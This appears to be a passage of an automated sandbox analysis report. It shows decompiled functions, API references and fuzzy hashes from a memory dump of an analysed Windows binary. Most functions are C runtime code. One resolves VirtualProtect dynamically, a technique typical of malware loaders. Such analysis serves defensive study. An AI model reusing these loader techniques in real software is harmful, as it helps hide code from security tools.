                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Exception@8H_prolog3Throwstd::bad_exception::bad_exception$ExceptionRaise_strlenstd::exception::exception
                  • String ID: invalid string argument$invalid string position
                  • API String ID: 3808644628-3740083952
                  • Opcode ID: dba47893a7da555e3c11fbd17a0312a2a1dec5ab0de22282eae602774f7d84e4
                  • Instruction ID: 6836d25a859e7f1f1db9386e19dac6458660400166952867fbc9272b813fb7a3
                  • Opcode Fuzzy Hash: dba47893a7da555e3c11fbd17a0312a2a1dec5ab0de22282eae602774f7d84e4
                  • Instruction Fuzzy Hash: 8B011E72910218ABCB01EBD1C846FDEBB78EF14355F10447BB204BA1D6DBB99A04C6AC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 55%
                  			E00417B75(intOrPtr* _a4) {
                  				signed int _v8;
                  				char _v12;
                  				char _v20;
                  				intOrPtr* _t11;
                  				intOrPtr _t12;
                  				void* _t15;
                  				intOrPtr* _t21;
                  				void* _t22;
                  
                  				_t11 =  *0x451258; // 0x0
                  				_t12 =  *_t11;
                  				if(_t12 == 0) {
                  					_push(0x29);
                  					_push(_a4);
                  					_t15 = E00417385(E00417184( &_v12, " throw("),  &_v20, 1);
                  					goto L5;
                  				} else {
                  					if(_t12 != 0x5a) {
                  						_push(0x29);
                  						_push(_a4);
                  						_t15 = E00417807(_t22,  &_v20, " throw(", E00417A99(_t22,  &_v12));
                  						L5:
                  						E0041782B(_t15);
                  						return _a4;
                  					} else {
                  						 *0x451258 =  *0x451258 + 1;
                  						_t21 = _a4;
                  						 *_t21 = 0;
                  						 *(_t21 + 4) = _v8 & 0xffff0000;
                  						return _t21;
                  					}
                  				}
                  			}











                  0x00417b7a
                  0x00417b7f
                  0x00417b86
                  0x00417bc9
                  0x00417bcb
                  0x00417be3
                  0x00000000
                  0x00417b88
                  0x00417b8a
                  0x00417ba7
                  0x00417ba9
                  0x00417bbf
                  0x00417be8
                  0x00417bea
                  0x00417bf3
                  0x00417b8c
                  0x00417b8c
                  0x00417b95
                  0x00417ba0
                  0x00417ba2
                  0x00417ba6
                  0x00417ba6
                  0x00417b8a

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Name::operator+$ArgumentDecorator::getNameName::Typesoperator+
                  • String ID: throw(
                  • API String ID: 4203687869-3159766648
                  • Opcode ID: 9b5626d3e7328c96dcbf69e7de1b231dae1bb6e3b2dcfec5759ffeb2b496ba49
                  • Instruction ID: aac9c60b271866fa9502b5ac30de225d0b6a12b4ee3a9721f3bcfdb5ae0d46ff
                  • Opcode Fuzzy Hash: 9b5626d3e7328c96dcbf69e7de1b231dae1bb6e3b2dcfec5759ffeb2b496ba49
                  • Instruction Fuzzy Hash: 1F018870648209ABCF10EF64DC46EED3BB5EB44308F04815AF905AB392D678D5858788
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0044C2A0(void* __ecx) {
                  				intOrPtr _v8;
                  				_Unknown_base(*)()* _t6;
                  
                  				_v8 = 0x20;
                  				_v8 = _v8 + 0x20;
                  				lstrcatW(0x46f998, L"kernel32.dll");
                  				_t6 = GetProcAddress(GetModuleHandleW(0x46f998), "VirtualProtect");
                  				 *0x46f380 = _t6;
                  				return _t6;
                  			}





                  0x0044c2a4
                  0x0044c2ab
                  0x0044c2b9
                  0x0044c2d0
                  0x0044c2d6
                  0x0044c2de

                  APIs
                  • lstrcatW.KERNEL32(0046F998,kernel32.dll), ref: 0044C2B9
                  • GetModuleHandleW.KERNEL32(0046F998), ref: 0044C2C4
                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 0044C2D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AddressHandleModuleProclstrcat
                  • String ID: $VirtualProtect$kernel32.dll
                  • API String ID: 1163435009-2616575124
                  • Opcode ID: 57ed4c1c6597f00e76e712b5bbf96bb213c659950951f2d61c6c920ea36d044e
                  • Instruction ID: 065932f7eefff8f14ef4c5232986abd9eb4df1f7df6974ebca2aa73f3e70aa32
                  • Opcode Fuzzy Hash: 57ed4c1c6597f00e76e712b5bbf96bb213c659950951f2d61c6c920ea36d044e
                  • Instruction Fuzzy Hash: ACD0C2F4944304BBC7009BD4BC0DB4E3B78EB08710B50017AF60EB2191E7B80588C79E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E0040EFEF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t24;
                  				void* _t35;
                  				intOrPtr* _t37;
                  				void* _t38;
                  				void* _t39;
                  
                  				_t39 = __eflags;
                  				_t27 = __ebx;
                  				_push(0xc);
                  				_push(0x47e410);
                  				E004041C4(__ebx, __edi, __esi);
                  				_t35 = E0040694F(__ebx, __edx, __edi, _t39);
                  				_t37 = E00406D1F(8, 1);
                  				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
                  				_t40 = _t37;
                  				if(_t37 != 0) {
                  					E0040EDEF(__ebx, __edx, _t35, _t37, __eflags);
                  					E0040E613(__ebx, __edx, _t35, _t37, __eflags);
                  					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
                  					 *(_t37 + 4) =  *(_t35 + 0x68);
                  					E0040CFC1(_t27, 0xc);
                  					_t5 = _t38 - 4;
                  					 *_t5 =  *(_t38 - 4) & 0x00000000;
                  					__eflags =  *_t5;
                  					E0040EC63( *_t37);
                  					 *(_t38 - 4) = 0xfffffffe;
                  					E0040F089();
                  					E0040CFC1(_t27, 0xd);
                  					 *(_t38 - 4) = 1;
                  					InterlockedIncrement( *(_t37 + 4));
                  					 *(_t38 - 4) = 0xfffffffe;
                  					E0040F095();
                  					_t24 = _t37;
                  				} else {
                  					 *((intOrPtr*)(E00403B7E(_t40))) = 0xc;
                  					_t24 = 0;
                  				}
                  				return E00404209(_t24);
                  			}








                  0x0040efef
                  0x0040efef
                  0x0040efef
                  0x0040eff1
                  0x0040eff6
                  0x0040f000
                  0x0040f00d
                  0x0040f00f
                  0x0040f012
                  0x0040f014
                  0x0040f025
                  0x0040f02a
                  0x0040f032
                  0x0040f037
                  0x0040f03c
                  0x0040f042
                  0x0040f042
                  0x0040f042
                  0x0040f048
                  0x0040f04e
                  0x0040f055
                  0x0040f05c
                  0x0040f062
                  0x0040f06c
                  0x0040f072
                  0x0040f079
                  0x0040f07e
                  0x0040f016
                  0x0040f01b
                  0x0040f021
                  0x0040f021
                  0x0040f085

                  APIs
                  • __getptd.LIBCMT ref: 0040EFFB
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __calloc_crt.LIBCMT ref: 0040F006
                    • Part of subcall function 00406D1F: __calloc_impl.LIBCMT ref: 00406D30
                    • Part of subcall function 00406D1F: Sleep.KERNEL32(00000000), ref: 00406D47
                  • __lock.LIBCMT ref: 0040F03C
                  • ___addlocaleref.LIBCMT ref: 0040F048
                  • __lock.LIBCMT ref: 0040F05C
                  • InterlockedIncrement.KERNEL32(?), ref: 0040F06C
                    • Part of subcall function 00403B7E: __getptd_noexit.LIBCMT ref: 00403B7E
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__getptd
                  • String ID:
                  • API String ID: 3538106438-0
                  • Opcode ID: bc5d6095969061b252cec48674e04f868670fb39a9369d8ca42a4d936d8f6beb
                  • Instruction ID: 37d7c8ca16e2fd726f6e3ec6351c10cea6f0844aba48303ea4d11cab51fbc4e0
                  • Opcode Fuzzy Hash: bc5d6095969061b252cec48674e04f868670fb39a9369d8ca42a4d936d8f6beb
                  • Instruction Fuzzy Hash: D801D271604302EAE7207FB6984270C76A0AF44728F20467EF4547B2C2CB7949408659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E0040B9DB(void* __edx, void* __esi, intOrPtr* _a4) {
                  				signed int _v8;
                  				intOrPtr _t11;
                  				intOrPtr* _t15;
                  				intOrPtr* _t19;
                  				void* _t23;
                  				void* _t25;
                  
                  				_t26 = __esi;
                  				_t24 = __edx;
                  				_t11 =  *((intOrPtr*)( *_a4));
                  				if(_t11 == 0xe0434f4d) {
                  					__eflags =  *((intOrPtr*)(E0040694F(_t23, __edx, _t25, __eflags) + 0x90));
                  					if(__eflags > 0) {
                  						_t15 = E0040694F(_t23, __edx, _t25, __eflags) + 0x90;
                  						 *_t15 =  *_t15 - 1;
                  						__eflags =  *_t15;
                  					}
                  					goto L5;
                  				} else {
                  					_t32 = _t11 - 0xe06d7363;
                  					if(_t11 != 0xe06d7363) {
                  						L5:
                  						__eflags = 0;
                  						return 0;
                  					} else {
                  						 *(E0040694F(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                  						_push(8);
                  						_push(0x47e280);
                  						E004041C4(_t23, _t25, __esi);
                  						_t19 =  *((intOrPtr*)(E0040694F(_t23, __edx, _t25, _t32) + 0x78));
                  						if(_t19 != 0) {
                  							_v8 = _v8 & 0x00000000;
                  							 *_t19();
                  							_v8 = 0xfffffffe;
                  						}
                  						return E00404209(E0041B841(_t23, _t24, _t25, _t26));
                  					}
                  				}
                  			}









                  0x0040b9db
                  0x0040b9db
                  0x0040b9e5
                  0x0040b9ec
                  0x0040ba0b
                  0x0040ba12
                  0x0040ba19
                  0x0040ba1e
                  0x0040ba1e
                  0x0040ba1e
                  0x00000000
                  0x0040b9ee
                  0x0040b9ee
                  0x0040b9f3
                  0x0040ba20
                  0x0040ba20
                  0x0040ba23
                  0x0040b9f5
                  0x0040b9fa
                  0x0040cb13
                  0x0040cb15
                  0x0040cb1a
                  0x0040cb24
                  0x0040cb29
                  0x0040cb2b
                  0x0040cb2f
                  0x0040cb3a
                  0x0040cb3a
                  0x0040cb4b
                  0x0040cb4b
                  0x0040b9f3

                  APIs
                  • __getptd.LIBCMT ref: 0040B9F5
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __getptd.LIBCMT ref: 0040BA06
                  • __getptd.LIBCMT ref: 0040BA14
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: bc1911c971a99eaeedd451675846135a61277c1a884a6e35b2f10b0cbda335d0
                  • Instruction ID: f54a6c0e218ad633bc623d9580d7e36b0c0123ed9ac57b05d7437104ea75ef14
                  • Opcode Fuzzy Hash: bc1911c971a99eaeedd451675846135a61277c1a884a6e35b2f10b0cbda335d0
                  • Instruction Fuzzy Hash: A3E048716101088FD7209769C046F253794EB84318F1600B7E80DDB3A3D73CD850599E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E0040EFE4(void* __ebx, void* __edi, void* __esi, void* __eflags, LONG** _a4) {
                  				signed int _v8;
                  				void* _t10;
                  				LONG* _t13;
                  				LONG* _t18;
                  				LONG* _t22;
                  				LONG** _t33;
                  
                  				_t31 = __edi;
                  				_t24 = __ebx;
                  				_push(8);
                  				_push(0x47e3e8);
                  				_t10 = E004041C4(__ebx, __edi, __esi);
                  				_t33 = _a4;
                  				if(_t33 != 0) {
                  					E0040CFC1(__ebx, 0xd);
                  					_v8 = _v8 & 0x00000000;
                  					_t13 = _t33[1];
                  					if(_t13 != 0 && InterlockedDecrement(_t13) == 0) {
                  						_t22 = _t33[1];
                  						_t42 = _t22 - 0x44f740;
                  						if(_t22 != 0x44f740) {
                  							_push(_t22);
                  							E00403E62(_t24, __edi, _t33, _t42);
                  						}
                  					}
                  					_v8 = 0xfffffffe;
                  					E0040EFCF();
                  					if( *_t33 != 0) {
                  						E0040CFC1(_t24, 0xc);
                  						_v8 = 1;
                  						E0040ECF2( *_t33);
                  						_t18 =  *_t33;
                  						if(_t18 != 0 &&  *_t18 == 0) {
                  							_t46 = _t18 - 0x44fc70;
                  							if(_t18 != 0x44fc70) {
                  								E0040EB1A(_t18);
                  							}
                  						}
                  						_v8 = 0xfffffffe;
                  						E0040EFDB();
                  					}
                  					 *_t33 = 0xbaadf00d;
                  					_t33[1] = 0xbaadf00d;
                  					_push(_t33);
                  					_t10 = E00403E62(_t24, _t31, _t33, _t46);
                  				}
                  				return E00404209(_t10);
                  			}









                  0x0040efe4
                  0x0040efe4
                  0x0040ef22
                  0x0040ef24
                  0x0040ef29
                  0x0040ef2e
                  0x0040ef33
                  0x0040ef3b
                  0x0040ef41
                  0x0040ef45
                  0x0040ef4a
                  0x0040ef57
                  0x0040ef5a
                  0x0040ef5f
                  0x0040ef61
                  0x0040ef62
                  0x0040ef67
                  0x0040ef5f
                  0x0040ef68
                  0x0040ef6f
                  0x0040ef77
                  0x0040ef7b
                  0x0040ef81
                  0x0040ef8a
                  0x0040ef90
                  0x0040ef94
                  0x0040ef9b
                  0x0040efa0
                  0x0040efa3
                  0x0040efa8
                  0x0040efa0
                  0x0040efa9
                  0x0040efb0
                  0x0040efb0
                  0x0040efba
                  0x0040efbc
                  0x0040efbf
                  0x0040efc0
                  0x0040efc5
                  0x0040efcb

                  APIs
                  • __lock.LIBCMT ref: 0040EF3B
                    • Part of subcall function 0040CFC1: __mtinitlocknum.LIBCMT ref: 0040CFD7
                    • Part of subcall function 0040CFC1: __amsg_exit.LIBCMT ref: 0040CFE3
                    • Part of subcall function 0040CFC1: EnterCriticalSection.KERNEL32(?,?,?,00403F71,00000004,0047DF50,0000000C,00406D35,?,?,00000000,00000000,00000000,?,00406901,00000001), ref: 0040CFEB
                  • InterlockedDecrement.KERNEL32(00000000), ref: 0040EF4D
                    • Part of subcall function 00403E62: __lock.LIBCMT ref: 00403E80
                    • Part of subcall function 00403E62: ___sbh_find_block.LIBCMT ref: 00403E8B
                    • Part of subcall function 00403E62: ___sbh_free_block.LIBCMT ref: 00403E9A
                    • Part of subcall function 00403E62: HeapFree.KERNEL32(00000000,?,0047DF30,0000000C,0040CFA2,00000000,0047E2E0,0000000C,0040CFDC,?,?,?,00403F71,00000004,0047DF50,0000000C), ref: 00403ECA
                    • Part of subcall function 00403E62: GetLastError.KERNEL32(?,00403F71,00000004,0047DF50,0000000C,00406D35,?,?,00000000,00000000,00000000,?,00406901,00000001,00000214), ref: 00403EDB
                  • __lock.LIBCMT ref: 0040EF7B
                  • ___removelocaleref.LIBCMT ref: 0040EF8A
                  • ___freetlocinfo.LIBCMT ref: 0040EFA3
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __lock$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
                  • String ID:
                  • API String ID: 1907232653-0
                  • Opcode ID: 03843a51e4bdf912d2830c8544586861ec1613f5916427fbb33fd9c71cf89ac5
                  • Instruction ID: 61995d92de73ab86334fc820be786a87e9b8955fa1ea628dc90416959d5fa8ca
                  • Opcode Fuzzy Hash: 03843a51e4bdf912d2830c8544586861ec1613f5916427fbb33fd9c71cf89ac5
                  • Instruction Fuzzy Hash: 23119A71604302EAEB20AF7B984571A76A49F00B24F24893FF454BB2C2CB7CD8908659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040E613(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t15;
                  				LONG* _t21;
                  				long _t23;
                  				void* _t31;
                  				LONG* _t33;
                  				void* _t34;
                  				void* _t35;
                  
                  				_t35 = __eflags;
                  				_t29 = __edx;
                  				_t25 = __ebx;
                  				_push(0xc);
                  				_push(0x47e388);
                  				E004041C4(__ebx, __edi, __esi);
                  				_t31 = E0040694F(__ebx, __edx, __edi, _t35);
                  				_t15 =  *0x44fc64; // 0xfffffffe
                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                  					E0040CFC1(_t25, 0xd);
                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                  					_t33 =  *(_t31 + 0x68);
                  					 *(_t34 - 0x1c) = _t33;
                  					__eflags = _t33 -  *0x44fb68; // 0x942c10
                  					if(__eflags != 0) {
                  						__eflags = _t33;
                  						if(_t33 != 0) {
                  							_t23 = InterlockedDecrement(_t33);
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								__eflags = _t33 - 0x44f740;
                  								if(__eflags != 0) {
                  									_push(_t33);
                  									E00403E62(_t25, _t31, _t33, __eflags);
                  								}
                  							}
                  						}
                  						_t21 =  *0x44fb68; // 0x942c10
                  						 *(_t31 + 0x68) = _t21;
                  						_t33 =  *0x44fb68; // 0x942c10
                  						 *(_t34 - 0x1c) = _t33;
                  						InterlockedIncrement(_t33);
                  					}
                  					 *(_t34 - 4) = 0xfffffffe;
                  					E0040E6AE();
                  				} else {
                  					_t33 =  *(_t31 + 0x68);
                  				}
                  				if(_t33 == 0) {
                  					E00406EDE(_t29, _t31, 0x20);
                  				}
                  				return E00404209(_t33);
                  			}










                  0x0040e613
                  0x0040e613
                  0x0040e613
                  0x0040e613
                  0x0040e615
                  0x0040e61a
                  0x0040e624
                  0x0040e626
                  0x0040e62e
                  0x0040e64f
                  0x0040e655
                  0x0040e659
                  0x0040e65c
                  0x0040e65f
                  0x0040e665
                  0x0040e667
                  0x0040e669
                  0x0040e66c
                  0x0040e672
                  0x0040e674
                  0x0040e676
                  0x0040e67c
                  0x0040e67e
                  0x0040e67f
                  0x0040e684
                  0x0040e67c
                  0x0040e674
                  0x0040e685
                  0x0040e68a
                  0x0040e68d
                  0x0040e693
                  0x0040e697
                  0x0040e697
                  0x0040e69d
                  0x0040e6a4
                  0x0040e636
                  0x0040e636
                  0x0040e636
                  0x0040e63b
                  0x0040e63f
                  0x0040e644
                  0x0040e64c

                  APIs
                  • __getptd.LIBCMT ref: 0040E61F
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __amsg_exit.LIBCMT ref: 0040E63F
                  • __lock.LIBCMT ref: 0040E64F
                  • InterlockedDecrement.KERNEL32(?), ref: 0040E66C
                  • InterlockedIncrement.KERNEL32(00942C10), ref: 0040E697
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID:
                  • API String ID: 4271482742-0
                  • Opcode ID: 036905ae6c0bb854c13454ee9e2e917981422368a4d446a692362d68b9e9cb0f
                  • Instruction ID: 3f2868211e2530df07ee20063ef1916b543885775ff60ede7a56dd7a9921fae7
                  • Opcode Fuzzy Hash: 036905ae6c0bb854c13454ee9e2e917981422368a4d446a692362d68b9e9cb0f
                  • Instruction Fuzzy Hash: 2E010031D007119BDB20AB26E80974E7760AF15724F450A3BE810772C1CB3CA8A2CFDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 41%
                  			E00403E62(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t10;
                  				intOrPtr _t13;
                  				intOrPtr _t23;
                  				void* _t25;
                  
                  				_push(0xc);
                  				_push(0x47df30);
                  				_t8 = E004041C4(__ebx, __edi, __esi);
                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                  				if(_t23 == 0) {
                  					L9:
                  					return E00404209(_t8);
                  				}
                  				if( *0x477ae0 != 3) {
                  					_push(_t23);
                  					L7:
                  					_t8 = HeapFree( *0x451064, 0, ??);
                  					_t31 = _t8;
                  					if(_t8 == 0) {
                  						_t10 = E00403B7E(_t31);
                  						 *_t10 = E00403B3C(GetLastError());
                  					}
                  					goto L9;
                  				}
                  				E0040CFC1(__ebx, 4);
                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                  				_t13 = E0040D0EF(_t23);
                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                  				if(_t13 != 0) {
                  					_push(_t23);
                  					_push(_t13);
                  					E0040D11F();
                  				}
                  				 *(_t25 - 4) = 0xfffffffe;
                  				_t8 = E00403EB8();
                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                  					goto L9;
                  				} else {
                  					_push( *((intOrPtr*)(_t25 + 8)));
                  					goto L7;
                  				}
                  			}







                  0x00403e62
                  0x00403e64
                  0x00403e69
                  0x00403e6e
                  0x00403e73
                  0x00403eea
                  0x00403eef
                  0x00403eef
                  0x00403e7c
                  0x00403ec1
                  0x00403ec2
                  0x00403eca
                  0x00403ed0
                  0x00403ed2
                  0x00403ed4
                  0x00403ee7
                  0x00403ee9
                  0x00000000
                  0x00403ed2
                  0x00403e80
                  0x00403e86
                  0x00403e8b
                  0x00403e91
                  0x00403e96
                  0x00403e98
                  0x00403e99
                  0x00403e9a
                  0x00403ea0
                  0x00403ea1
                  0x00403ea8
                  0x00403eb1
                  0x00000000
                  0x00403eb3
                  0x00403eb3
                  0x00000000
                  0x00403eb3

                  APIs
                  • __lock.LIBCMT ref: 00403E80
                    • Part of subcall function 0040CFC1: __mtinitlocknum.LIBCMT ref: 0040CFD7
                    • Part of subcall function 0040CFC1: __amsg_exit.LIBCMT ref: 0040CFE3
                    • Part of subcall function 0040CFC1: EnterCriticalSection.KERNEL32(?,?,?,00403F71,00000004,0047DF50,0000000C,00406D35,?,?,00000000,00000000,00000000,?,00406901,00000001), ref: 0040CFEB
                  • ___sbh_find_block.LIBCMT ref: 00403E8B
                  • ___sbh_free_block.LIBCMT ref: 00403E9A
                  • HeapFree.KERNEL32(00000000,?,0047DF30,0000000C,0040CFA2,00000000,0047E2E0,0000000C,0040CFDC,?,?,?,00403F71,00000004,0047DF50,0000000C), ref: 00403ECA
                  • GetLastError.KERNEL32(?,00403F71,00000004,0047DF50,0000000C,00406D35,?,?,00000000,00000000,00000000,?,00406901,00000001,00000214), ref: 00403EDB
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 2714421763-0
                  • Opcode ID: 7ea762eda1ebf044c4f8c405e59c29fa4e3d9de34db5be565e958af849e5b4de
                  • Instruction ID: 06b77f85b5cd2d30928d852232947d2651d9a29eb6c4ca12233567086fa98640
                  • Opcode Fuzzy Hash: 7ea762eda1ebf044c4f8c405e59c29fa4e3d9de34db5be565e958af849e5b4de
                  • Instruction Fuzzy Hash: 45012C71914311AADF20AFA2DC06B5F3E689F0076AF10463FF105B61D2CB7C9A818A9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041067F(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				char _v8;
                  				signed int _v12;
                  				char _v20;
                  				char _t43;
                  				char _t46;
                  				signed int _t53;
                  				signed int _t54;
                  				intOrPtr _t56;
                  				int _t57;
                  				int _t58;
                  				signed short* _t59;
                  				short* _t60;
                  				int _t65;
                  				char* _t73;
                  
                  				_t73 = _a8;
                  				if(_t73 == 0 || _a12 == 0) {
                  					L5:
                  					return 0;
                  				} else {
                  					if( *_t73 != 0) {
                  						E004043DC( &_v20, __edi, _a16);
                  						_t43 = _v20;
                  						__eflags =  *(_t43 + 0x14);
                  						if( *(_t43 + 0x14) != 0) {
                  							_t46 = E004107B0( *_t73 & 0x000000ff,  &_v20);
                  							__eflags = _t46;
                  							if(_t46 == 0) {
                  								__eflags = _a4;
                  								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                  								if(__eflags != 0) {
                  									L10:
                  									__eflags = _v8;
                  									if(_v8 != 0) {
                  										_t53 = _v12;
                  										_t11 = _t53 + 0x70;
                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                  										__eflags =  *_t11;
                  									}
                  									return 1;
                  								}
                  								L21:
                  								_t54 = E00403B7E(__eflags);
                  								 *_t54 = 0x2a;
                  								__eflags = _v8;
                  								if(_v8 != 0) {
                  									_t54 = _v12;
                  									_t33 = _t54 + 0x70;
                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                  									__eflags =  *_t33;
                  								}
                  								return _t54 | 0xffffffff;
                  							}
                  							_t56 = _v20;
                  							_t65 =  *(_t56 + 0xac);
                  							__eflags = _t65 - 1;
                  							if(_t65 <= 1) {
                  								L17:
                  								__eflags = _a12 -  *(_t56 + 0xac);
                  								if(__eflags < 0) {
                  									goto L21;
                  								}
                  								__eflags = _t73[1];
                  								if(__eflags == 0) {
                  									goto L21;
                  								}
                  								L19:
                  								_t57 =  *(_t56 + 0xac);
                  								__eflags = _v8;
                  								if(_v8 == 0) {
                  									return _t57;
                  								}
                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                  								return _t57;
                  							}
                  							__eflags = _a12 - _t65;
                  							if(_a12 < _t65) {
                  								goto L17;
                  							}
                  							__eflags = _a4;
                  							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                  							__eflags = _t58;
                  							_t56 = _v20;
                  							if(_t58 != 0) {
                  								goto L19;
                  							}
                  							goto L17;
                  						}
                  						_t59 = _a4;
                  						__eflags = _t59;
                  						if(_t59 != 0) {
                  							 *_t59 =  *_t73 & 0x000000ff;
                  						}
                  						goto L10;
                  					} else {
                  						_t60 = _a4;
                  						if(_t60 != 0) {
                  							 *_t60 = 0;
                  						}
                  						goto L5;
                  					}
                  				}
                  			}

















                  0x00410689
                  0x00410690
                  0x004106a7
                  0x00000000
                  0x00410697
                  0x00410699
                  0x004106b3
                  0x004106b8
                  0x004106bb
                  0x004106be
                  0x004106e7
                  0x004106ee
                  0x004106f0
                  0x00410771
                  0x0041078c
                  0x0041078e
                  0x004106ce
                  0x004106ce
                  0x004106d1
                  0x004106d3
                  0x004106d6
                  0x004106d6
                  0x004106d6
                  0x004106d6
                  0x00000000
                  0x004106dc
                  0x00410750
                  0x00410750
                  0x00410755
                  0x0041075b
                  0x0041075e
                  0x00410760
                  0x00410763
